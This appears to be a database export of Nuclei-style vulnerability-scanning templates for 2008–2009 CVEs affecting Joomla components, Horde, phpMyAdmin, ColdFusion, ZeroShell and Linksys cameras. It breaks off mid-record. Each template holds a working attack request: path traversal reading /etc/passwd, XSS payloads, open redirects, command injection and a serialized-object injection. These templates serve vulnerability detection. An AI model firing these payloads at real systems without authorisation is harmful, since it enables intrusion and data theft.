"CVE-2008-6172.yaml", "content": "id: CVE-2008-6172\n\ninfo:\n name: Joomla! Component RWCards 3.0.11 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! 
when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Update Joomla! Component RWCards to the latest version to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6817\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6172\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/46081\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2008-6172\n cwe-id: CWE-22\n epss-score: 0.00509\n epss-percentile: 0.76096\n cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: weberr\n product: rwcards\n tags: cve2008,cve,joomla,lfi,edb,weberr\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c60015398304f9ce817dba9913fa3eea08043b9830cef5a4e1baeaadb99b5a0c022100d34a8d77d912dc1372e761e3ea0d4ccda3e9bcacddb4dd58752f9c53d81c8048:922c64590222798bb761d5b6d8e72950", "hash": "6ddb112e7a327b0587ad2736216fe21a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4f" }, "name": "CVE-2008-6222.yaml", "content": "id: CVE-2008-6222\n\ninfo:\n name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. 
(dot dot) in the include_file parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6980\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6222\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2008-6222\n cwe-id: CWE-22\n epss-score: 0.01029\n epss-percentile: 0.82175\n cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlashowroom\n product: pro_desk_support_center\n tags: cve,cve2008,joomla,lfi,edb,joomlashowroom\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202a6b3c7843f9b11700d264ebe9e7d62ab4a3218e9f4b692e8ebb15b025cb36a70221008873d32a32de8df6cd215ab066f2fb7847612833f7b326d8d4cc071bbc0a043a:922c64590222798bb761d5b6d8e72950", "hash": "598bb5cf96a2abe8e2862952d7867688", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e50" }, "name": "CVE-2008-6465.yaml", "content": "id: CVE-2008-6465\n\ninfo:\n name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. 
An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, which can allow theft of cookie-based authentication credentials and other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.\n reference:\n - http://www.xssing.com/index.php?x=3&y=65\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6465\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-6465\n cwe-id: CWE-79\n epss-score: 0.00421\n epss-percentile: 0.73765\n cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: parallels\n product: h-sphere\n shodan-query: title:\"Parallels H-Sphere\"\n tags: cve,cve2008,xss,parallels,h-sphere\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\\\" onfocus=alert(document.domain); autofocus'\n - 'Please enter login name & password'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950", "hash": "4925ec2c56f9294b091c39fa8f77c7cd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": 
{ "$oid": "66477a413521042ccf307e51" }, "name": "CVE-2008-6668.yaml", "content": "id: CVE-2008-6668\n\ninfo:\n name: nweb2fax <=0.2.7 - Local File Inclusion\n author: geeknik\n severity: medium\n description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n remediation: |\n Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/5856\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6668\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2008-6668\n cwe-id: CWE-22\n epss-score: 0.00359\n epss-percentile: 0.71607\n cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dirk_bartley\n product: nweb2fax\n tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd\"\n - \"{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950", "hash": "3678731d4b995820b7a479ac2abf49b7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307e52" }, "name": "CVE-2008-6982.yaml", "content": "id: CVE-2008-6982\n\ninfo:\n name: Devalcms 1.4a - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6369\n - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6982\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-6982\n cwe-id: CWE-79\n epss-score: 0.0038\n epss-percentile: 0.70097\n cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: devalcms\n product: devalcms\n tags: cve,cve2008,devalcms,xss,cms,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'sub menu for: '\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100930ae1e3a335eff7b78c478fd3c7f1177b65130a6d6b2b00ff6507a2c29d87900220537ba82e9274860321609d107916524e805cd669e6949ae5fce2998f92e135f9:922c64590222798bb761d5b6d8e72950", "hash": "62bbdd39c29a4f4755397c2ce8b6b9e3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e53" }, "name": "CVE-2008-7269.yaml", "content": "id: CVE-2008-7269\n\ninfo:\n name: UC 
Gateway Investment SiteEngine v5.0 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action.\n remediation: |\n Apply the latest patches or updates provided by the vendor to fix the open redirect vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2008-7269\n - https://www.exploit-db.com/exploits/6823\n - https://github.com/tr3ss/newclei\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P\n cvss-score: 5.8\n cve-id: CVE-2008-7269\n cwe-id: CWE-20\n epss-score: 0.01425\n epss-percentile: 0.86241\n cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: boka\n product: siteengine\n shodan-query: html:\"SiteEngine\"\n tags: cve,cve2008,redirect,siteengine,boka\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api.php?action=logout&forward=http://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950", "hash": "303f0321124ca825249a00350dae7261", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e54" }, "name": "CVE-2009-0347.yaml", "content": "id: CVE-2009-0347\n\ninfo:\n name: Autonomy Ultraseek - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.\n impact: |\n An attacker can craft a 
URL that redirects users to a malicious website, leading to potential phishing attacks.\n remediation: |\n Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2009-0347\n - https://www.exploit-db.com/exploits/32766\n - https://www.kb.cert.org/vuls/id/202753\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/48336\n - http://sunbeltblog.blogspot.com/2009/01/constant-stream-of-ultraseek-redirects.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P\n cvss-score: 5.8\n cve-id: CVE-2009-0347\n cwe-id: CWE-59\n epss-score: 0.10607\n epss-percentile: 0.94532\n cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: autonomy\n product: ultraseek\n tags: cve,cve2009,redirect,autonomy\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cs.html?url=http://www.interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100cf3670c23a13df5e6953abeb0b31099f649dedb0d0f8d27279f83729a6dfa817022100892363b09ea6413d98fec323ec8d65cc59e55bfc00166958fbaff5ac83e0f192:922c64590222798bb761d5b6d8e72950", "hash": "ed9520f3490853145dd49baef08594a3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e55" }, "name": "CVE-2009-0545.yaml", "content": "id: CVE-2009-0545\n\ninfo:\n name: ZeroShell <=1.0beta11 - Remote Code Execution\n author: geeknik\n severity: critical\n description: ZeroShell 1.0beta11 and earlier allow remote attackers to execute arbitrary commands via cgi-bin/kerbynet through shell metacharacters in the type parameter in a NoAuthREQ x509List action.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a 
patched version of ZeroShell.\n reference:\n - https://www.exploit-db.com/exploits/8023\n - https://nvd.nist.gov/vuln/detail/CVE-2009-0545\n - http://www.zeroshell.net/eng/announcements/\n - http://www.ikkisoft.com/stuff/LC-2009-01.txt\n - http://www.vupen.com/english/advisories/2009/0385\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2009-0545\n cwe-id: CWE-20\n epss-score: 0.97081\n epss-percentile: 0.99755\n cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zeroshell\n product: zeroshell\n tags: cve,cve2009,edb,zeroshell,kerbynet,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22\"\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4b0a00483046022100b390e617f8d9be114aea50840c529aab08fac1822e4dece7746cb7733a409631022100b30c36b38ea49931b16615862de2267a59370daf662b7e77c88b25add453fb8e:922c64590222798bb761d5b6d8e72950", "hash": "31a1822de19bc85bcdb85d3384538518", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e56" }, "name": "CVE-2009-0932.yaml", "content": "id: CVE-2009-0932\n\ninfo:\n name: Horde/Horde Groupware - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php, which allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware.\n reference:\n - https://www.exploit-db.com/exploits/16154\n - 
http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5\n - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2\n - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.413.2.5\n - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.503\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N\n cvss-score: 6.4\n cve-id: CVE-2009-0932\n cwe-id: CWE-22\n epss-score: 0.04048\n epss-percentile: 0.919\n cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: debian\n product: horde\n tags: cve,cve2009,horde,lfi,traversal,edb,debian\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220752ee73ce2196cc54c39a5e60377c58c87e7ef7ef489fd990d2b463b6ddd900402204885ac378662f0bf728920184aab940b6d54ebdb022e1767ebc9b7e4283d8ad1:922c64590222798bb761d5b6d8e72950", "hash": "e632ce26af4bd1b525c6c47c47e0b903", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e57" }, "name": "CVE-2009-1151.yaml", "content": "id: CVE-2009-1151\n\ninfo:\n name: PhpMyAdmin Scripts - Remote Code Execution\n author: princechaddha\n severity: high\n description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. 
Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.\n remediation: |\n Update PhpMyAdmin to the latest version or apply the necessary patches.\n reference:\n - https://www.phpmyadmin.net/security/PMASA-2009-3/\n - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433\n - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301\n - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php\n - https://nvd.nist.gov/vuln/detail/CVE-2009-1151\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-1151\n cwe-id: CWE-94\n epss-score: 0.79256\n epss-percentile: 0.98197\n cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phpmyadmin\n product: phpmyadmin\n tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce\n\nhttp:\n - raw:\n - |\n POST /scripts/setup.php HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d034c615116d4e4388066b8ecd70006fb486a97f1893f14acdd83c4b1d48a2ec02200b87edb8aa8815371b589ebc0773ca1f591ef511e9f6dfb2c4a6bdc6cfc624f8:922c64590222798bb761d5b6d8e72950", "hash": "b48c4d5412c4dbc66cd8d997f05ac4f9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e58" }, "name": "CVE-2009-1496.yaml", "content": "id: CVE-2009-1496\n\ninfo:\n name: Joomla! 
Cmimarketplace 0.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: |\n Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/8367\n - https://nvd.nist.gov/vuln/detail/CVE-2009-1496\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2009-1496\n cwe-id: CWE-22\n epss-score: 0.00802\n epss-percentile: 0.81288\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve2009,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220058c6301672453287635b209959b9ac18463e075a84677673e28deef2283f91a0221009ef0ec653e81bc72e2c7d58deff90a7f85cba1e35851c7a2ae9f20d1d9ff24d5:922c64590222798bb761d5b6d8e72950", "hash": "fda2ff7c175439c375c78a5a79090874", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e59" }, "name": "CVE-2009-1558.yaml", "content": "id: CVE-2009-1558\n\ninfo:\n name: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read 
arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/32954\n - http://www.vupen.com/english/advisories/2009/1173\n - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/\n - https://nvd.nist.gov/vuln/detail/CVE-2009-1558\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/50231\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2009-1558\n cwe-id: CWE-22\n epss-score: 0.01101\n epss-percentile: 0.84137\n cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: wvc54gca\n tags: cve2009,cve,iot,linksys,camera,traversal,lfi,cisco,firmware,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220350ec03119d612c5f8713699db8e69ed0b506879bc6ee64e2d75bba83968464502204f724f9426b0b6fc4ebc02416b6f5dc37095ea0970d13a9fa55961eec88551f1:922c64590222798bb761d5b6d8e72950", "hash": "ba48d072debddacf20a9e60a69520ae8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5a" }, "name": "CVE-2009-1872.yaml", "content": "id: CVE-2009-1872\n\ninfo:\n name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting\n author: princechaddha\n severity: medium\n description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to 
administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.\n reference:\n - https://www.tenable.com/cve/CVE-2009-1872\n - http://www.adobe.com/support/security/bulletins/apsb09-12.html\n - http://www.dsecrg.com/pages/vul/show.php?id=122\n - https://nvd.nist.gov/vuln/detail/CVE-2009-1872\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2009-1872\n cwe-id: CWE-79\n epss-score: 0.37553\n epss-percentile: 0.97102\n cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: adobe\n product: coldfusion\n shodan-query: http.component:\"Adobe ColdFusion\"\n tags: cve2009,cve,adobe,xss,coldfusion,tenable\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210099e04590b72f5f59dff9760d627e7042601a45b16bea2c23852fa76186fae5ab0220361a0788e7674d6ed82b5e924aace4e3d604f237ac2666fa79b1e91830fd2e1a:922c64590222798bb761d5b6d8e72950", "hash": "55d3fc98bc02e56bb20a47a8ef8d12f2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5b" }, "name": "CVE-2009-2015.yaml", "content": "id: CVE-2009-2015\n\ninfo:\n name: Joomla! 
MooFAQ 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).\n impact: |\n The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.\n remediation: |\n Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/8898\n - http://www.vupen.com/english/advisories/2009/1530\n - https://nvd.nist.gov/vuln/detail/CVE-2009-2015\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-2015\n cwe-id: CWE-22\n epss-score: 0.01197\n epss-percentile: 0.84862\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve,cve2009,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210084264e87dd97831fdd770570139d33f282ca38d9dd2d90eb80aa16ac245aade0022100a38d28caf33176434cefef437a45a72f7bce297b01a68dc9d0ffc0ec18545cda:922c64590222798bb761d5b6d8e72950", "hash": "271df5fa5356048844c0103cc45db4b6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5c" }, "name": "CVE-2009-2100.yaml", "content": "id: CVE-2009-2100\n\ninfo:\n name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! 
JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: |\n Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/8946\n - https://nvd.nist.gov/vuln/detail/CVE-2009-2100\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2009-2100\n cwe-id: CWE-22\n epss-score: 0.00779\n epss-percentile: 0.80973\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve2009,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220011b812bacaed12772d45c7485d04136e35b9196b4c435b488601681c7bb3be50220722ab9dd33d98de09bfaec078bfd702692da5772714e412426ee37084ac9b862:922c64590222798bb761d5b6d8e72950", "hash": "38529333fa820fc478f90fcf6c5b6969", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5d" }, "name": "CVE-2009-3053.yaml", "content": "id: CVE-2009-3053\n\ninfo:\n name: Joomla! Agora 3.0.0b - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! 
